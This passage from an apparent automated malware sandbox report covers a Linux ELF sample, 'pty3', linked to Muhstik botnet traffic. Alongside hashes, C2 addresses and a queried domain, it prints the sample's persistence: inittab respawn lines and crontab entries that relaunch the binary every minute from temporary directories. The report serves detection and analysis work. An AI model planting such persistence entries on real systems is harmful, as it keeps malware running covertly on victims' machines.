                                                                                                                                          • 153.92.4.31
                                                                                                                                          bWWYiK6e8PGet hashmaliciousBrowse
                                                                                                                                          • 153.92.4.31
                                                                                                                                          02tGmRk9B8Get hashmaliciousBrowse
                                                                                                                                          • 153.92.4.31
                                                                                                                                          ZcxVQiqSNTGet hashmaliciousBrowse
                                                                                                                                          • 153.92.4.31
                                                                                                                                          SKM6197534BT New Order.xlsxGet hashmaliciousBrowse
                                                                                                                                          • 2.57.90.16
                                                                                                                                          RFQ - Mopcoms Turkey .xlsxGet hashmaliciousBrowse
                                                                                                                                          • 45.130.228.232
                                                                                                                                          Logo Embroidery-Auto Inquiry.xlsxGet hashmaliciousBrowse
                                                                                                                                          • 31.170.167.224
                                                                                                                                          AUCAe6w7Nm.exeGet hashmaliciousBrowse
                                                                                                                                          • 31.170.167.224
                                                                                                                                          Request for Quotation - 4RFQ001247.xlsxGet hashmaliciousBrowse
                                                                                                                                          • 31.170.167.224
                                                                                                                                          Quotation for Urgent PO 110921.exeGet hashmaliciousBrowse
                                                                                                                                          • 2.57.90.16
                                                                                                                                          j1MTWQvoZS.exeGet hashmaliciousBrowse
                                                                                                                                          • 31.170.167.224
                                                                                                                                          fhs2UR1fSG.exeGet hashmaliciousBrowse
                                                                                                                                          • 2.57.90.16
                                                                                                                                          PO 211213-0221A.exeGet hashmaliciousBrowse
                                                                                                                                          • 193.168.192.133
                                                                                                                                          GHPYl58St4.exeGet hashmaliciousBrowse
                                                                                                                                          • 31.170.167.224
                                                                                                                                          DHL SHIPMENT ADDRESS.xlsxGet hashmaliciousBrowse
                                                                                                                                          • 31.170.167.224
                                                                                                                                          Aviso 9858.xlsmGet hashmaliciousBrowse
                                                                                                                                          • 37.44.244.177

                                                                                                                                          JA3 Fingerprints

                                                                                                                                          No context

                                                                                                                                          Dropped Files

                                                                                                                                          No context

                                                                                                                                          Created / dropped Files

                                                                                                                                          /dev/shm/pty3
                                                                                                                                          Process:/usr/bin/cp
                                                                                                                                          File Type:ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):48980
                                                                                                                                          Entropy (8bit):7.873177412760172
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:OiLxh+reNihi1th267sCpgTw59MweK5MBNjMNJAWZWXeZxdcNm9t/sjucZ:tPe2tsCpWcMweK5MMDzo8dc89tDw
                                                                                                                                          MD5:FDD5532C5EC4D3238D2FD36B0A0B187F
                                                                                                                                          SHA1:0E281FA38DCD1C3DB0F9059991A351AD4D67238D
                                                                                                                                          SHA-256:C01FA3E23232DA79E1EE1E722050AB8AC09B90BFEBBF93A440BC1316EF7A127C
                                                                                                                                          SHA-512:27DF31AE49131BA273A06511EE9B5975E81679DDB6BBE4F697F8E83DC3A5DD11BA2DD5E4C4F58CA32A2ED5A38CE547D625B80B9D5CCA1D494292058F411D330E
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Virustotal, Detection: 43%, Browse
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 51%
                                                                                                                                          Reputation:low
                                                                                                                                          Preview: .ELF..............>.............@...................@.8...@.....................................................................P.......P.Q.....P.Q............................./l......p...................b.........!..ELF......>....@.m.m...H.#..v..8......+...@..<a..R.....&.;...Q...}v.&-.Z.7Q.td ................Q..P....I.....H.......d...............=.x..UH..t..8........7..Q...H......H..u.0......t...RA........y?...f...m...U$P...yQ.vw3g,.\=cO.t.J...O...R"I...A..?H..o..1...^@./..PTH..0M@..o.-.....I....O....~...+..E.N...C.;....H...H...H...k)....}.@zQu.".....O.. ...(..?.....}..~...a.}..~..nuBE.".....U......Fy..1...u....7.=6..E..h...c......."e..na G. .....1.x..r2.....!...~'..1.u.x.....x.%..Jkx.. .rJ. 9..c.+.x.Pr..w.wgG..w.!..B..+{w`wr(9.?w.wC..Q.vB+..%..v.v.vv..J.v^!).p.+Ov..C.4v.v.u...%.!+(9...u.u..Pr}u\u!...2!.+#u..JN.u.t..(9.t.! +.S.!.trtJ.%.Qt0trH8;.!$+.s....s.s..C.sp!(9...+asFs.Pr(%s.sC...r!,+..%..r.r.rv..JnrD!).p0+5r..C..r.q.q$..%.!4+Pr.9.q.qG..cqBq.B..g!8+.q(9...p.p
                                                                                                                                          /etc/inittab
                                                                                                                                          Process:/usr/bin/cat
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):142
                                                                                                                                          Entropy (8bit):4.326664977926882
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:IQfXzstFXzsm3V9vtXzsqsRFXzsqjKYAXzsqG:IQo37uTR
                                                                                                                                          MD5:5FF9D0108FCFD3FE6D507A5C71471FF7
                                                                                                                                          SHA1:DC713D40F4F57F8C428C4E69D8773CE4BAA39299
                                                                                                                                          SHA-256:BF7A744DCB866FE6C59F07C77D2B579C84B057F79321028B6B45320E4F6A2EED
                                                                                                                                          SHA-512:FFCA8F8BAC306F7910A8D62AB68083AE78206BDBB7EFCD4AAEB5BBF7A0BB56841FA70E359DAF3954912C649779E409284C40E5AD3C7E562FE04C359C038BB834
                                                                                                                                          Malicious:true
                                                                                                                                          Reputation:low
                                                                                                                                          Preview: 0:2345:respawn:/tmp/pty3.0:2345:respawn:/dev/shm/pty3.0:2345:respawn:/var/tmp/pty3.0:2345:respawn:/var/lock/pty3.0:2345:respawn:/var/run/pty3.
                                                                                                                                          /etc/inittab2
                                                                                                                                          Process:/bin/sh
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):29
                                                                                                                                          Entropy (8bit):4.090234012145145
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:IQfXzsqG:IQK
                                                                                                                                          MD5:56FB9AFECF429F855832A7B43D82F4A4
                                                                                                                                          SHA1:9C516C4B773BC052FA25BD26AAFB34232BEFF257
                                                                                                                                          SHA-256:2DF88CC9DB68E3E385BC0790FDAC424B8C0E81BED9E562FD82CCBF7C84680E78
                                                                                                                                          SHA-512:A5F505C6E94F158859D8559D2BEEB4DA1106B3F6260E2B2ABD16630BBB6A218CE2E832EFB69F8C45F0B8413BF2BF645BC64D855738E0D2C63F5A034873363DB5
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview: 0:2345:respawn:/var/run/pty3.
                                                                                                                                          /run/lock/pty3
                                                                                                                                          Process:/usr/bin/cp
                                                                                                                                          File Type:ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):48980
                                                                                                                                          Entropy (8bit):7.873177412760172
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:OiLxh+reNihi1th267sCpgTw59MweK5MBNjMNJAWZWXeZxdcNm9t/sjucZ:tPe2tsCpWcMweK5MMDzo8dc89tDw
                                                                                                                                          MD5:FDD5532C5EC4D3238D2FD36B0A0B187F
                                                                                                                                          SHA1:0E281FA38DCD1C3DB0F9059991A351AD4D67238D
                                                                                                                                          SHA-256:C01FA3E23232DA79E1EE1E722050AB8AC09B90BFEBBF93A440BC1316EF7A127C
                                                                                                                                          SHA-512:27DF31AE49131BA273A06511EE9B5975E81679DDB6BBE4F697F8E83DC3A5DD11BA2DD5E4C4F58CA32A2ED5A38CE547D625B80B9D5CCA1D494292058F411D330E
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Virustotal, Detection: 43%, Browse
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 51%
                                                                                                                                          Reputation:low
                                                                                                                                          Preview: .ELF..............>.............@...................@.8...@.....................................................................P.......P.Q.....P.Q............................./l......p...................b.........!..ELF......>....@.m.m...H.#..v..8......+...@..<a..R.....&.;...Q...}v.&-.Z.7Q.td ................Q..P....I.....H.......d...............=.x..UH..t..8........7..Q...H......H..u.0......t...RA........y?...f...m...U$P...yQ.vw3g,.\=cO.t.J...O...R"I...A..?H..o..1...^@./..PTH..0M@..o.-.....I....O....~...+..E.N...C.;....H...H...H...k)....}.@zQu.".....O.. ...(..?.....}..~...a.}..~..nuBE.".....U......Fy..1...u....7.=6..E..h...c......."e..na G. .....1.x..r2.....!...~'..1.u.x.....x.%..Jkx.. .rJ. 9..c.+.x.Pr..w.wgG..w.!..B..+{w`wr(9.?w.wC..Q.vB+..%..v.v.vv..J.v^!).p.+Ov..C.4v.v.u...%.!+(9...u.u..Pr}u\u!...2!.+#u..JN.u.t..(9.t.! +.S.!.trtJ.%.Qt0trH8;.!$+.s....s.s..C.sp!(9...+asFs.Pr(%s.sC...r!,+..%..r.r.rv..JnrD!).p0+5r..C..r.q.q$..%.!4+Pr.9.q.qG..cqBq.B..g!8+.q(9...p.p
                                                                                                                                          /run/pty3
                                                                                                                                          Process:/usr/bin/cp
                                                                                                                                          File Type:ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):48980
                                                                                                                                          Entropy (8bit):7.873177412760172
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:OiLxh+reNihi1th267sCpgTw59MweK5MBNjMNJAWZWXeZxdcNm9t/sjucZ:tPe2tsCpWcMweK5MMDzo8dc89tDw
                                                                                                                                          MD5:FDD5532C5EC4D3238D2FD36B0A0B187F
                                                                                                                                          SHA1:0E281FA38DCD1C3DB0F9059991A351AD4D67238D
                                                                                                                                          SHA-256:C01FA3E23232DA79E1EE1E722050AB8AC09B90BFEBBF93A440BC1316EF7A127C
                                                                                                                                          SHA-512:27DF31AE49131BA273A06511EE9B5975E81679DDB6BBE4F697F8E83DC3A5DD11BA2DD5E4C4F58CA32A2ED5A38CE547D625B80B9D5CCA1D494292058F411D330E
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 51%
                                                                                                                                          Reputation:low
                                                                                                                                          Preview: .ELF..............>.............@...................@.8...@.....................................................................P.......P.Q.....P.Q............................./l......p...................b.........!..ELF......>....@.m.m...H.#..v..8......+...@..<a..R.....&.;...Q...}v.&-.Z.7Q.td ................Q..P....I.....H.......d...............=.x..UH..t..8........7..Q...H......H..u.0......t...RA........y?...f...m...U$P...yQ.vw3g,.\=cO.t.J...O...R"I...A..?H..o..1...^@./..PTH..0M@..o.-.....I....O....~...+..E.N...C.;....H...H...H...k)....}.@zQu.".....O.. ...(..?.....}..~...a.}..~..nuBE.".....U......Fy..1...u....7.=6..E..h...c......."e..na G. .....1.x..r2.....!...~'..1.u.x.....x.%..Jkx.. .rJ. 9..c.+.x.Pr..w.wgG..w.!..B..+{w`wr(9.?w.wC..Q.vB+..%..v.v.vv..J.v^!).p.+Ov..C.4v.v.u...%.!+(9...u.u..Pr}u\u!...2!.+#u..JN.u.t..(9.t.! +.S.!.trtJ.%.Qt0trH8;.!$+.s....s.s..C.sp!(9...+asFs.Pr(%s.sC...r!,+..%..r.r.rv..JnrD!).p0+5r..C..r.q.q$..%.!4+Pr.9.q.qG..cqBq.B..g!8+.q(9...p.p
                                                                                                                                          /var/spool/cron/crontabs/tmp.001wAF
                                                                                                                                          Process:/usr/bin/crontab
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):214
                                                                                                                                          Entropy (8bit):5.072929187836181
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQLqUdvGMQ5UYLtCFt39YBtGFz:8QjHig8RDeHLU9Yfa
                                                                                                                                          MD5:B2120EC0BD1178FF7A70EF4783357B0C
                                                                                                                                          SHA1:1E4BBE488005CD40ADF64E53FC7C9AF45595AC6D
                                                                                                                                          SHA-256:3A465EEE011CDB88AD58DA7D79F3256F5516494BCDB9C966BA51A974D958312E
                                                                                                                                          SHA-512:4FC375AEFECA7CB516CCCEEB777883776D40BA96BC0A9BF46C57FB7BC7C6B33AE96B19D7C915C77846BD8B061707099D21D0A333F4038D27F796EFDFC3AE8AE8
                                                                                                                                          Malicious:true
                                                                                                                                          Reputation:low
                                                                                                                                          Preview: # DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Thu Dec 23 11:31:20 2021).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).* * * * * /tmp/pty3 > /dev/null 2>&1 &.
                                                                                                                                          /var/spool/cron/crontabs/tmp.2HVWUA
                                                                                                                                          Process:/usr/bin/crontab
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):344
                                                                                                                                          Entropy (8bit):4.9133944051734595
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQLqUkvGMQ5UYLtCFt39YBtGF5qzK37hGF5qIajbGF5f:8QjHig8qeHLU9YfsqzKdsq1bsq0Ya
                                                                                                                                          MD5:AF1974E24213CF6B57893F593BCE9986
                                                                                                                                          SHA1:78241B0D72E9E35325190F26FF6CFBF2FA82CE2E
                                                                                                                                          SHA-256:B44CAE719F583E05DCDF6C66AA744E6F1D885FE317AEC4324F00D19111BF44BE
                                                                                                                                          SHA-512:33475AADB54FDDF85A225581EBE48E6C6D7698EC2D20F15987181DA9E408A31868A953C28131B53A5A8479FEC223EE2F2F39B36A8DFC6FDD367413BC61702789
                                                                                                                                          Malicious:true
                                                                                                                                          Reputation:low
                                                                                                                                          Preview: # DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Thu Dec 23 11:31:23 2021).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).* * * * * /tmp/pty3 > /dev/null 2>&1 &.* * * * * /dev/shm/pty3 > /dev/null 2>&1 &.* * * * * /var/tmp/pty3 > /dev/null 2>&1 &.* * * * * /var/lock/pty3 > /dev/null 2>&1 &.
                                                                                                                                          /var/spool/cron/crontabs/tmp.7EMzq6
                                                                                                                                          Process:/usr/bin/crontab
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):300
                                                                                                                                          Entropy (8bit):4.959035701492149
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQLqUfttGMQ5UYLtCFt39YBtGF5qzK37hGF5qIajbGFz:8QjHig8PeHLU9YfsqzKdsq1ba
                                                                                                                                          MD5:E10775D9C7495A56D985BA6D24F04971
                                                                                                                                          SHA1:F2AF6D078A22A54D218125378405153F13F35244
                                                                                                                                          SHA-256:41192B41826BDFE662B33F87608BD8CD0D465F47980CB250ECFB4CA9828ADF1E
                                                                                                                                          SHA-512:0F5F5EA86E2DB57511CEC9C972361B54334B84D5625464ED33AC41C4CF837AAF89B0E43EAB476FEB7ED81F4C0AB047F3AE7490819F3ABEA62C266701FDB7DF82
                                                                                                                                          Malicious:true
                                                                                                                                          Reputation:low
                                                                                                                                          Preview: # DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Thu Dec 23 11:31:22 2021).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).* * * * * /tmp/pty3 > /dev/null 2>&1 &.* * * * * /dev/shm/pty3 > /dev/null 2>&1 &.* * * * * /var/tmp/pty3 > /dev/null 2>&1 &.
                                                                                                                                          /var/spool/cron/crontabs/tmp.ASDRld
                                                                                                                                          Process:/usr/bin/crontab
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):387
                                                                                                                                          Entropy (8bit):4.860926909779814
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:8QjHig8VDeHLU9YfsqzKdsq1bsq0Ysqha:8+mDALUqkqLqSqeq4
                                                                                                                                          MD5:B8695D1996AC130769ABCB0BE9B83CE6
                                                                                                                                          SHA1:4D6DA9159B3CF32289049D8F89CACA60B41946CF
                                                                                                                                          SHA-256:E3D4D7BCF71DC0721B0BD9D8539EFA0A1DF8FE88106805E3CC2FBFADB1673C0E
                                                                                                                                          SHA-512:842696DAD0EB0F9CBB1827AB8511471B1C3BB9F92DF273D7E82FBAFE098FACDD10AE3AF40D6922BD79C430969857B8A7EFE53EF86203C93D2BF73AF6C654E523
                                                                                                                                          Malicious:true
                                                                                                                                          Reputation:low
                                                                                                                                          Preview: # DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Thu Dec 23 11:31:24 2021).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).* * * * * /tmp/pty3 > /dev/null 2>&1 &.* * * * * /dev/shm/pty3 > /dev/null 2>&1 &.* * * * * /var/tmp/pty3 > /dev/null 2>&1 &.* * * * * /var/lock/pty3 > /dev/null 2>&1 &.* * * * * /var/run/pty3 > /dev/null 2>&1 &.
                                                                                                                                          /var/spool/cron/crontabs/tmp.FFzEXt
                                                                                                                                          Process:/usr/bin/crontab
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):257
                                                                                                                                          Entropy (8bit):5.022659358967117
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQLqUfttGMQ5UYLtCFt39YBtGF5qzK37hGFz:8QjHig8PeHLU9YfsqzKda
                                                                                                                                          MD5:C71599D8680967BEB704A5F31B72354B
                                                                                                                                          SHA1:C98DBA8217CD8EA9D51DDE2E54DC64116B4B8386
                                                                                                                                          SHA-256:4A2AE607AB7E3A3C691C696E8E885FC48BE0CB69E8F7C3FE5CEED755DF996DA6
                                                                                                                                          SHA-512:FCF3E123F8DC13A8865A9ACBB23ED338CEEB48BDEBB4797713A056CC0B42D2262142A3E5D975D3F1CB8A878F9D0C699769458C57B985D02CF453CC66447EC1BD
                                                                                                                                          Malicious:true
                                                                                                                                          Reputation:low
                                                                                                                                          Preview: # DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Thu Dec 23 11:31:22 2021).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).* * * * * /tmp/pty3 > /dev/null 2>&1 &.* * * * * /dev/shm/pty3 > /dev/null 2>&1 &.
                                                                                                                                          /var/tmp/pty3
                                                                                                                                          Process:/usr/bin/cp
                                                                                                                                          File Type:ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):48980
                                                                                                                                          Entropy (8bit):7.873177412760172
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:OiLxh+reNihi1th267sCpgTw59MweK5MBNjMNJAWZWXeZxdcNm9t/sjucZ:tPe2tsCpWcMweK5MMDzo8dc89tDw
                                                                                                                                          MD5:FDD5532C5EC4D3238D2FD36B0A0B187F
                                                                                                                                          SHA1:0E281FA38DCD1C3DB0F9059991A351AD4D67238D
                                                                                                                                          SHA-256:C01FA3E23232DA79E1EE1E722050AB8AC09B90BFEBBF93A440BC1316EF7A127C
                                                                                                                                          SHA-512:27DF31AE49131BA273A06511EE9B5975E81679DDB6BBE4F697F8E83DC3A5DD11BA2DD5E4C4F58CA32A2ED5A38CE547D625B80B9D5CCA1D494292058F411D330E
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 51%
                                                                                                                                          Reputation:low
                                                                                                                                          Preview: .ELF..............>.............@...................@.8...@.....................................................................P.......P.Q.....P.Q............................./l......p...................b.........!..ELF......>....@.m.m...H.#..v..8......+...@..<a..R.....&.;...Q...}v.&-.Z.7Q.td ................Q..P....I.....H.......d...............=.x..UH..t..8........7..Q...H......H..u.0......t...RA........y?...f...m...U$P...yQ.vw3g,.\=cO.t.J...O...R"I...A..?H..o..1...^@./..PTH..0M@..o.-.....I....O....~...+..E.N...C.;....H...H...H...k)....}.@zQu.".....O.. ...(..?.....}..~...a.}..~..nuBE.".....U......Fy..1...u....7.=6..E..h...c......."e..na G. .....1.x..r2.....!...~'..1.u.x.....x.%..Jkx.. .rJ. 9..c.+.x.Pr..w.wgG..w.!..B..+{w`wr(9.?w.wC..Q.vB+..%..v.v.vv..J.v^!).p.+Ov..C.4v.v.u...%.!+(9...u.u..Pr}u\u!...2!.+#u..JN.u.t..(9.t.! +.S.!.trtJ.%.Qt0trH8;.!$+.s....s.s..C.sp!(9...+asFs.Pr(%s.sC...r!,+..%..r.r.rv..JnrD!).p0+5r..C..r.q.q$..%.!4+Pr.9.q.qG..cqBq.B..g!8+.q(9...p.p

                                                                                                                                          Static File Info

                                                                                                                                          General

                                                                                                                                          File type:ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
                                                                                                                                          Entropy (8bit):7.873177412760172
                                                                                                                                          TrID:
                                                                                                                                          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                                                                          File name:pty3
                                                                                                                                          File size:48980
                                                                                                                                          MD5:fdd5532c5ec4d3238d2fd36b0a0b187f
                                                                                                                                          SHA1:0e281fa38dcd1c3db0f9059991a351ad4d67238d
                                                                                                                                          SHA256:c01fa3e23232da79e1ee1e722050ab8ac09b90bfebbf93a440bc1316ef7a127c
                                                                                                                                          SHA512:27df31ae49131ba273a06511ee9b5975e81679ddb6bbe4f697f8e83dc3a5dd11ba2dd5e4c4f58ca32a2ed5a38ce547d625b80b9d5cca1d494292058f411d330e
                                                                                                                                          SSDEEP:768:OiLxh+reNihi1th267sCpgTw59MweK5MBNjMNJAWZWXeZxdcNm9t/sjucZ:tPe2tsCpWcMweK5MMDzo8dc89tDw
                                                                                                                                          File Content Preview:.ELF..............>.............@...................@.8...@.....................................................................P.......P.Q.....P.Q............................./l......p...................b.........!..ELF......>....@.m.m...H.#..v..8......+

                                                                                                                                          Static ELF Info

                                                                                                                                          ELF header

                                                                                                                                          Class:ELF64
                                                                                                                                          Data:2's complement, little endian
                                                                                                                                          Version:1 (current)
                                                                                                                                          Machine:Advanced Micro Devices X86-64
                                                                                                                                          Version Number:0x1
                                                                                                                                          Type:EXEC (Executable file)
                                                                                                                                          OS/ABI:UNIX - Linux
                                                                                                                                          ABI Version:0
                                                                                                                                          Entry Point Address:0x10b690
                                                                                                                                          Flags:0x0
                                                                                                                                          ELF Header Size:64
                                                                                                                                          Program Header Offset:64
                                                                                                                                          Program Header Size:56
                                                                                                                                          Number of Program Headers:2
                                                                                                                                          Section Header Offset:0
                                                                                                                                          Section Header Size:64
                                                                                                                                          Number of Section Headers:0
                                                                                                                                          Header String Table Index:0

                                                                                                                                          Program Segments

                                                                                                                                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                                                                          LOAD0x00x1000000x1000000xbdf40xbdf44.37010x5R E0x100000
                                                                                                                                          LOAD0x1ad500x51ad500x51ad500x00x00.00000x6RW 0x100000

                                                                                                                                          Network Behavior

                                                                                                                                          Snort IDS Alerts

                                                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                          12/23/21-11:31:26.324961TCP2034743ET TROJAN ELF/Muhstik Botnet CnC Activity487148080192.168.2.23156.67.220.165

                                                                                                                                          Network Port Distribution

                                                                                                                                          TCP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Dec 23, 2021 11:31:19.390398979 CET42836443192.168.2.2391.189.91.43
                                                                                                                                          Dec 23, 2021 11:31:19.902496099 CET4251680192.168.2.23109.202.202.202
                                                                                                                                          Dec 23, 2021 11:31:22.846735001 CET570248080192.168.2.2345.132.241.68
                                                                                                                                          Dec 23, 2021 11:31:23.004362106 CET80805702445.132.241.68192.168.2.23
                                                                                                                                          Dec 23, 2021 11:31:24.310235023 CET487148080192.168.2.23156.67.220.165
                                                                                                                                          Dec 23, 2021 11:31:24.586339951 CET808048714156.67.220.165192.168.2.23
                                                                                                                                          Dec 23, 2021 11:31:24.590825081 CET487148080192.168.2.23156.67.220.165
                                                                                                                                          Dec 23, 2021 11:31:25.310271025 CET487148080192.168.2.23156.67.220.165
                                                                                                                                          Dec 23, 2021 11:31:25.586566925 CET808048714156.67.220.165192.168.2.23
                                                                                                                                          Dec 23, 2021 11:31:25.586900949 CET487148080192.168.2.23156.67.220.165
                                                                                                                                          Dec 23, 2021 11:31:26.324960947 CET487148080192.168.2.23156.67.220.165
                                                                                                                                          Dec 23, 2021 11:31:26.601186037 CET808048714156.67.220.165192.168.2.23
                                                                                                                                          Dec 23, 2021 11:31:26.601528883 CET808048714156.67.220.165192.168.2.23
                                                                                                                                          Dec 23, 2021 11:31:26.601964951 CET487148080192.168.2.23156.67.220.165
                                                                                                                                          Dec 23, 2021 11:31:26.620393038 CET487148080192.168.2.23156.67.220.165
                                                                                                                                          Dec 23, 2021 11:31:26.897075891 CET808048714156.67.220.165192.168.2.23
                                                                                                                                          Dec 23, 2021 11:31:26.897470951 CET487148080192.168.2.23156.67.220.165
                                                                                                                                          Dec 23, 2021 11:31:26.899209976 CET487148080192.168.2.23156.67.220.165
                                                                                                                                          Dec 23, 2021 11:31:27.215109110 CET808048714156.67.220.165192.168.2.23
                                                                                                                                          Dec 23, 2021 11:31:27.215404034 CET487148080192.168.2.23156.67.220.165
                                                                                                                                          Dec 23, 2021 11:31:27.491563082 CET808048714156.67.220.165192.168.2.23
                                                                                                                                          Dec 23, 2021 11:31:27.491609097 CET808048714156.67.220.165192.168.2.23
                                                                                                                                          Dec 23, 2021 11:31:27.491894960 CET487148080192.168.2.23156.67.220.165
                                                                                                                                          Dec 23, 2021 11:31:33.726334095 CET43928443192.168.2.2391.189.91.42
                                                                                                                                          Dec 23, 2021 11:31:46.014168978 CET42836443192.168.2.2391.189.91.43
                                                                                                                                          Dec 23, 2021 11:31:50.110038996 CET4251680192.168.2.23109.202.202.202
                                                                                                                                          Dec 23, 2021 11:32:14.685667038 CET43928443192.168.2.2391.189.91.42

                                                                                                                                          UDP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Dec 23, 2021 11:31:21.532661915 CET4352953192.168.2.231.1.1.1
                                                                                                                                          Dec 23, 2021 11:31:21.713069916 CET53435291.1.1.1192.168.2.23
                                                                                                                                          Dec 23, 2021 11:31:21.713284016 CET4352953192.168.2.231.1.1.1
                                                                                                                                          Dec 23, 2021 11:31:21.729979992 CET53435291.1.1.1192.168.2.23
                                                                                                                                          Dec 23, 2021 11:31:21.744107008 CET5330053192.168.2.231.1.1.1
                                                                                                                                          Dec 23, 2021 11:31:21.786370039 CET53533001.1.1.1192.168.2.23
                                                                                                                                          Dec 23, 2021 11:31:21.786593914 CET5330053192.168.2.231.1.1.1
                                                                                                                                          Dec 23, 2021 11:31:21.802721024 CET53533001.1.1.1192.168.2.23
                                                                                                                                          Dec 23, 2021 11:31:22.166868925 CET3520953192.168.2.231.1.1.1
                                                                                                                                          Dec 23, 2021 11:31:22.208149910 CET53352091.1.1.1192.168.2.23
                                                                                                                                          Dec 23, 2021 11:31:22.208921909 CET3520953192.168.2.231.1.1.1
                                                                                                                                          Dec 23, 2021 11:31:22.225281000 CET53352091.1.1.1192.168.2.23
                                                                                                                                          Dec 23, 2021 11:31:22.402837038 CET4707453192.168.2.231.1.1.1
                                                                                                                                          Dec 23, 2021 11:31:22.782742977 CET53470741.1.1.1192.168.2.23
                                                                                                                                          Dec 23, 2021 11:31:22.783082962 CET4707453192.168.2.231.1.1.1
                                                                                                                                          Dec 23, 2021 11:31:22.799360037 CET53470741.1.1.1192.168.2.23
                                                                                                                                          Dec 23, 2021 11:31:22.812175035 CET3663953192.168.2.231.1.1.1
                                                                                                                                          Dec 23, 2021 11:31:22.829125881 CET53366391.1.1.1192.168.2.23
                                                                                                                                          Dec 23, 2021 11:31:22.829816103 CET3663953192.168.2.231.1.1.1
                                                                                                                                          Dec 23, 2021 11:31:22.846288919 CET53366391.1.1.1192.168.2.23
                                                                                                                                          Dec 23, 2021 11:31:24.109206915 CET3907353192.168.2.231.1.1.1
                                                                                                                                          Dec 23, 2021 11:31:24.140013933 CET53390731.1.1.1192.168.2.23
                                                                                                                                          Dec 23, 2021 11:31:24.140464067 CET3907353192.168.2.231.1.1.1
                                                                                                                                          Dec 23, 2021 11:31:24.157177925 CET53390731.1.1.1192.168.2.23
                                                                                                                                          Dec 23, 2021 11:31:24.276345015 CET4203853192.168.2.231.1.1.1
                                                                                                                                          Dec 23, 2021 11:31:24.293042898 CET53420381.1.1.1192.168.2.23
                                                                                                                                          Dec 23, 2021 11:31:24.293488979 CET4203853192.168.2.231.1.1.1
                                                                                                                                          Dec 23, 2021 11:31:24.309743881 CET53420381.1.1.1192.168.2.23

                                                                                                                                          DNS Queries

                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                          Dec 23, 2021 11:31:21.532661915 CET192.168.2.231.1.1.10x9bf2Standard query (0)l.deutschland-zahlung.netA (IP address)IN (0x0001)
                                                                                                                                          Dec 23, 2021 11:31:21.713284016 CET192.168.2.231.1.1.10x9bf2Standard query (0)l.deutschland-zahlung.netA (IP address)IN (0x0001)
                                                                                                                                          Dec 23, 2021 11:31:21.744107008 CET192.168.2.231.1.1.10x32e8Standard query (0)l.deutschland-zahlung.netA (IP address)IN (0x0001)
                                                                                                                                          Dec 23, 2021 11:31:21.786593914 CET192.168.2.231.1.1.10x32e8Standard query (0)l.deutschland-zahlung.netA (IP address)IN (0x0001)
